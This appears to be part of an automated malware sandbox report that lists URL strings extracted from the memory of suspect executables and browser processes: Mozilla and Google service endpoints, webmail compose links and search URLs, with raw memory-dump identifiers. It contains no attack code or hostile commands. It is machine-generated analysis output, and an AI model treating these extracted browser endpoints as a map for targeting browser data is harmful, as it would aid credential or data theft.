                          Source: 7b9f3f6834.exe, 00000009.00000003.2647648125.0000000005DEF000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2648045423.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2647840214.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3193106380.00000000019E2000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811496040.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811369674.0000000005E9F000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811865064.0000000005E9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: 7b9f3f6834.exe, 00000009.00000003.2647648125.0000000005DEF000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2648045423.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2647840214.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811496040.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811369674.0000000005E9F000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811865064.0000000005E9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: 7b9f3f6834.exe, 00000009.00000003.2647648125.0000000005DEF000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2648045423.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2647840214.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3193106380.00000000019E2000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811496040.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811369674.0000000005E9F000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811865064.0000000005E9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: firefox.exe, 00000030.00000003.3041540010.000001E57D6CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/y
                          Source: firefox.exe, 0000001A.00000003.2825201061.0000018D72D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2828031848.0000018D72D25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2826822259.0000018D72D33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
                          Source: firefox.exe, 0000001A.00000003.2825201061.0000018D72D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2828031848.0000018D72D25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2826822259.0000018D72D33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
                          Source: firefox.exe, 00000021.00000002.2921553083.000001F3C3712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
                          Source: firefox.exe, 00000030.00000003.3062213581.000001E57D754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
                          Source: firefox.exe, 00000030.00000003.3093201942.000001E580493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1i
                          Source: firefox.exe, 00000030.00000003.3093201942.000001E580493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1i#
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
                          Source: firefox.exe, 00000021.00000002.2921553083.000001F3C3712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/
                          Source: firefox.exe, 00000021.00000002.2921553083.000001F3C37C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
                          Source: firefox.exe, 00000021.00000002.2921553083.000001F3C37C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
                          Source: firefox.exe, 00000021.00000002.2921553083.000001F3C372F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
                          Source: firefox.exe, 00000021.00000002.2921553083.000001F3C37C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
                          Source: firefox.exe, 00000021.00000002.2921553083.000001F3C37C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendations
                          Source: firefox.exe, 0000001A.00000003.2899689547.0000018D7CDD4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2896861944.0000018D7CDCB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3072593750.000001E57D4C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
                          Source: firefox.exe, 0000001A.00000003.2899689547.0000018D7CDD4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2896861944.0000018D7CDCB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3072593750.000001E57D4C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
                          Source: firefox.exe, 0000001A.00000003.2819477848.0000018D7271E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2818931962.0000018D74800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2820218486.0000018D7273A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2822012559.0000018D72773000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2821424363.0000018D72757000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
                          Source: chrome.exe, 00000022.00000003.2872758565.0000082800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                          Source: chrome.exe, 00000022.00000003.2870150846.0000082800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2883346954.000008280080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                          Source: chrome.exe, 00000022.00000003.2872758565.0000082800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hj(
                          Source: chrome.exe, 00000022.00000003.2872758565.0000082800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                          Source: chrome.exe, 00000022.00000003.2870150846.0000082800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2883346954.000008280080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                          Source: chrome.exe, 00000022.00000003.2872758565.0000082800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
                          Source: chrome.exe, 00000022.00000003.2872758565.0000082800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gpuweb.github.io/gpuweb/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
                          Source: firefox.exe, 00000030.00000003.3093201942.000001E580493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881a
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://ideas.mozilla.org/
                          Source: firefox.exe, 00000030.00000003.3209599840.000001E57D535000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
                          Source: firefox.exe, 00000021.00000002.2921553083.000001F3C37EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org
                          Source: firefox.exe, 00000021.00000002.2921553083.000001F3C37EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://install.mozilla.org
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                          Source: firefox.exe, 00000030.00000003.3108396248.000001E58021D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema.
                          Source: firefox.exe, 00000030.00000003.3108396248.000001E58021D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema./
                          Source: firefox.exe, 00000030.00000003.3108396248.000001E58021D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2020-12/schema/
                          Source: firefox.exe, 00000030.00000003.3108396248.000001E58021D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
                          Source: chrome.exe, 00000022.00000003.2883346954.000008280080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                          Source: chrome.exe, 00000022.00000003.2870150846.0000082800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2883346954.000008280080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                          Source: chrome.exe, 00000022.00000003.2870150846.0000082800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2883346954.000008280080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                          Source: chrome.exe, 00000022.00000003.2883346954.000008280080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                          Source: chrome.exe, 00000022.00000003.2870150846.0000082800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2883346954.000008280080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                          Source: chrome.exe, 00000022.00000003.2874440566.00000828006E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                          Source: chrome.exe, 00000022.00000003.2883346954.000008280080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000030.00000003.3024454780.000001E575DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
                          Source: firefox.exe, 00000030.00000003.3224140114.000001E578A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                          Source: firefox.exe, 00000030.00000003.3224140114.000001E578A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                          Source: firefox.exe, 0000001A.00000003.2825201061.0000018D72D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2828031848.0000018D72D25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2826822259.0000018D72D33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
                          Source: firefox.exe, 0000001A.00000003.2825201061.0000018D72D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2828031848.0000018D72D25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2826822259.0000018D72D33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%s
                          Source: firefox.exe, 0000001A.00000003.2825201061.0000018D72D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2828031848.0000018D72D25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2826822259.0000018D72D33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
                          Source: firefox.exe, 00000021.00000002.2921553083.000001F3C3786000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3126528497.000001E5765C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3128084836.000001E5765C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3132248353.000001E5765C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3133263027.000001E5765C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3098704284.000001E5765C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3102704883.000001E5765C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3105310182.000001E5765C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mitmdetection.services.mozilla.com/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/about
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/breach-details/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/dashboard
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/preferences
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://oauth.accounts.firefox.com/v1
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                          Source: firefox.exe, 0000001A.00000003.2825201061.0000018D72D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2828031848.0000018D72D25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2826822259.0000018D72D33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
                          Source: firefox.exe, 0000001A.00000003.2825201061.0000018D72D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2828031848.0000018D72D25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2826822259.0000018D72D33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://profile.accounts.firefox.com/v1
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/api/v1/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
                          Source: firefox.exe, 00000030.00000003.3216743370.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
                          Source: firefox.exe, 00000030.00000003.3216743370.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
                          Source: firefox.exe, 00000030.00000003.3216743370.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
                          Source: firefox.exe, 0000001A.00000003.2821424363.0000018D72757000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3234358102.000001E575C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
